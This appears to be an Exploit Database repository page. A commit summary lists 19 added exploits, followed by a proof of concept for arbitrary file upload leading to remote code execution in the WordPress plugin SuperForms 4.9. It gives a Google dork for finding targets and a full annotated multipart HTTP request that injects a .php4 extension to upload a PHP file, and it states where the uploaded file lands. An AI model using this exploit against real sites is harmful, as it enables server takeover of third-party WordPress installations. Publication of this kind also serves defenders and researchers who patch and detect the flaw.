27af25c8c3
19 changes to exploits/shellcodes jQuery UI 1.12.1 - Denial of Service (DoS) Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3) Microsoft Exchange 2019 - Server-Side Request Forgery KZTech T3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) WordPress Plugin SuperForms 4.9 - Arbitrary File Upload Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated) Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting Online Ordering System 1.0 - Arbitrary File Upload Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) CouchCMS 2.2.1 - Persistent Cross-Site Scripting Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC) MagpieRSS 0.72 - 'url' Command Injection CouchCMS 2.2.1 - Server-Side Request Forgery GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting Montiorr 1.7.6m - Persistent Cross-Site Scripting
50 lines
No EOL
1.7 KiB
Text
50 lines
No EOL
1.7 KiB
Text
# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
|
|
# Exploit Author: ABDO10
|
|
# Date : Jan - 28 - 2021
|
|
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
|
|
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
|
|
# Version : All (<= 4.9.X)
|
|
# data in http request :
|
|
|
|
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
|
|
<=== exploit end point
|
|
Host: localhost
|
|
User-Agent: UserAgent
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------423513681827540048931513055996
|
|
Content-Length: 7058
|
|
Origin: localhost
|
|
Connection: close
|
|
Referer: localhost
|
|
Cookie:
|
|
|
|
-----------------------------423513681827540048931513055996
|
|
Content-Disposition: form-data; name="accept_file_types"
|
|
|
|
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
|
|
inject extension (|PHP4) to validate file to upload
|
|
-----------------------------423513681827540048931513055996
|
|
Content-Disposition: form-data; name="max_file_size"
|
|
|
|
8000000
|
|
-----------------------------423513681827540048931513055996
|
|
Content-Disposition: form-data; name="image_library"
|
|
|
|
0
|
|
-----------------------------423513681827540048931513055996
|
|
Content-Disposition: form-data; name="files[]";
|
|
filename="filename.(extension)" <==== inject code extension (.php4)
|
|
for example
|
|
Content-Type: application/pdf
|
|
|
|
Evil codes to be uploaded
|
|
|
|
-----------------------------423513681827540048931513055996--
|
|
|
|
# Uploaded Malicious File can be Found in :
|
|
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
|
|
u can get <id> from server reply . |